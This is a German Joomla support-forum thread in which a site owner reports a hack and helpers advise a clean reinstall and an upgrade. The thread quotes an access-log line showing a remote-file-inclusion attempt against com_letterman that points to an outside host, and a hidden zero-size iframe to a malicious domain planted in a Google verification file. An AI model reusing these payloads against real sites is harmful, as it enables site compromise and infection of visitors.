diesmal ging es wieder über einen normalen Linkaufruf.
Und die Componente ( com_letterman )hab ich noch nicht mal installiert.
GET /index2.php?option=com_content&do_pdf=1&id=4%20%20//index.php?option=com_letterman&task=view&Itemid=&m osConfig.absolute.path=http://team-sekip.cc/Source/sikat? HTTP/1.1" 200 27 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Wenn die Komponente nicht installiert ist, kann man darüber auch keine Angriffe tätigen. Das im Log ein 200er-Return-Code vom Webserver geliefert wurde (=erfolgreich) hängt damit zusammen, das der Aufruf ja über die index.php des Joomla erfolgte und nicht als Direktaufruf zu einem Letterman-Script. Weil die index.php sicherlich existiert, wurde ein erfolgreicher Zugriff gemeldet, der in Wirklichkeit aber nichts bewirkt.
Gruß! Uwe
fc-hosting.de
. . . . . . . . . . . .kleine Joomla-Helferlein :: Gehackt? Was tun? :: Migration 1.7->2.5
und weiter gehts :-(
unsere Seite ist jetzt eine :
"Als attakierend gemeldete Website" aufgeführt, wenn man dessen URL eingibt.
komischerweise muss sich jemand bei Google Webmastertools NEU angemeldet haben, unsere Website ** LINK ENTFERNT ** angegeben haben und die nötige verify Datei auf unseren Webspace bekommen haben.
Somit war der Eigentum bestätigt.
Dies erfolgte am 03.03.2010, was ich anhand des Zeitstempels sehe.
google3f833fa1d32geändert.html
Danach wurde in der Google verify Datein der Code abgeändert in :
<iframe src="http://nsfer.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Als Google prüfte, haben die natürlich gleich gesehen das da was nicht stimmt.
Das kann doch schon nicht mehr autmotisiert gemacht worden sein, oder ?
Danke
Geändert von blackice2999 (18.03.2010 um 22:52 Uhr)
Hallo,
ob so etwas automatisiert gemacht worden ist, oder nicht mag ich nicht beurteilen aber es gibt bestimmt noch Spammer mit zuviel Zeit. Irgendetwas passt vielleicht auch mit Deinem Backup nicht, oder Du hast nicht alles befolgt, was zu tun war nach dem Hack.
Meiner Meinung nach bleibt Dir nur noch die Möglichkeit, alles zu löschen und neu aufzusetzen. Vorher auf alle Fälle, sofern noch nicht geschehen, den Hoster informieren, vielleicht liegt es gar nicht an deiner Seite, sondern eine andere auf dem Server ist gehackt worden und aufgrund falscher Servereinstellungen hat es nun Deines ( und möglicherweise auch andere Seiten ) mit erwischt.
Gruß
Chris
Wie kann man denn mit so einem Link sowas erreichen ?
**LINK ENTFERNT **
Text Ansicht :
** LINK ENTFERNT**
Geändert von blackice2999 (18.03.2010 um 22:51 Uhr)
Hmm... bist du absolut beratungsresistent?
Die Antwort ist immer die selbige, denn es gibt keine Andere:
HIER
Noch einen Rat: Mach die Seite neu, gleich auf 1.5.15 weil "...ab dem 22. Juli 2009 die alte Joomla! Version 1.0 offiziell nicht mehr supported wird..."
Wäre ein guter Moment, deine Seite ins Reine zu bringen, weil auf deinen Link Klick ich mit DER Vorgeschichte garantiert nicht!
es ist mir schon klar das ich die Sicherheits-Lücke finden muss, ich finde diese aber nicht.
Ich habe noch nicht einmal diese Komponente com_letterman ! Und die können bereits mit einer normalen URL wo etwas dran gehängt ist die Seite knacken.
Kopschüttel !
Berechtigungen
LinkBack URL
About LinkBacks
Zitieren
... Problem gelöst?!
Lesezeichen